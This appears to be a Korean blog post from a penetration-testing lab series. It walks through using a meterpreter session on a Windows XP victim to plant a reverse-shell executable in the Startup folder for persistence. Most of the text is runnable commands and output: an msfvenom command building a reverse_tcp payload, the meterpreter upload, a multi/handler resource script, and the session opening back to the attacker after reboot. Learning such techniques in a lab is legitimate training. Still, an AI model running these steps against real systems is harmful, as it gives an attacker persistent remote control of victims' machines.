실습> meterpreter 명령어 사용하기
Attacker가 공격을 해서 meterpreter 쉘이 실행된 후 진행한다.
meterpreter > help
cd Change directory
lcd Change local working directory
download Download a file or directory
upload Upload a file or directory
ls List files
lls List local files
pwd Print working directory
lpwd Print local working directory
1. 디렉터리 이동
meterpreter > pwd
C:\Documents and Settings\ksw\바탕 화면
meterpreter > lpwd
/root
meterpreter > cd ..
meterpreter > pwd
C:\Documents and Settings\ksw
부팅해서 로그인을 하면 시작프로그램 폴더에 있는 프로그램은 자동으로 시작된다.
C:\Documents and Settings\ksw\시작 메뉴\프로그램\시작프로그램
meterpreter > cd "시작 메뉴\프로그램\시작프로그램"
meterpreter > pwd
C:\Documents and Settings\ksw\시작 메뉴\프로그램\시작프로그램
2. 악성파일 생성
다른 터미널을 열어서 malware.exe 파일을 생성한다.
Attacker# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=192.168.108.102 lport=443 -f exe -o /var/www/html/malware.exe
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: /var/www/html/malware.exe
3. 악성파일 업로드
upload 명령어의 도움말을 확인한다.
meterpreter > help upload
Usage: upload [options] src1 src2 src3 ... destination
Uploads local files and directories to the remote machine.
OPTIONS:
-h Help banner
-r Upload recursively
/var/www/html/malware.exe 파일을 Victim의 시작프로그램 디렉터리에 업로드한다.
meterpreter > upload /var/www/html/malware.exe
[*] uploading : /var/www/html/malware.exe -> malware.exe
[*] Uploaded 72.07 KiB of 72.07 KiB (100.0%): /var/www/html/malware.exe -> malware.exe
[*] uploaded : /var/www/html/malware.exe -> malware.exe
meterpreter > exit
msf6 exploit(multi/handler) > exit
4. 공격 대기
Attacker# vi 윈도우시작프로그램.rc
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.108.102
set LPORT 443
run
Attacker# msfconsole -r 윈도우시작프로그램.rc
:
:(생략)
resource (윈도우시작프로그램.rc)> run
[*] Started reverse TCP handler on 192.168.108.102:443
5. 윈도우 부팅
윈도우 XP를 부팅한다.
6. 악성코드 감염
윈도우가 켜지면서 시작프로그램 폴더에 malware.exe가 실행되면서 Attacker에게 연결된다.
[*] Started reverse TCP handler on 192.168.108.102:443
[*] Sending stage (175174 bytes) to 192.168.108.105
[*] Meterpreter session 1 opened (192.168.108.102:443 -> 192.168.108.105:1030 ) at 2022-01-05 02:48:44 -0500
meterpreter >
meterpreter > sysinfo
Computer : VICTIM_WINXP
OS : Windows XP (5.1 Build 2600, Service Pack 3).
Architecture : x86
System Language : ko_KR
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > ipconfig
Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1
Interface 2
============
Name : AMD PCNET Family PCI Ethernet Adapter - rface
Hardware MAC : 00:0c:29:0e:30:1e
MTU : 1500
IPv4 Address : 192.168.108.105
IPv4 Netmask : 255.255.255.0
'Linux > 모의해킹' 카테고리의 다른 글
| 키 로그 (Key Log) (0) | 2022.01.05 |
|---|---|
| 파일 다운로드 (0) | 2022.01.05 |
| 쉘스크립트를 활용한 공격 1 & 2 (0) | 2022.01.04 |
| Download_exec Payload (0) | 2022.01.04 |
| 아드레날린 프로그램 취약점을 이용한 Reverse Shell 연결하기 (0) | 2022.01.04 |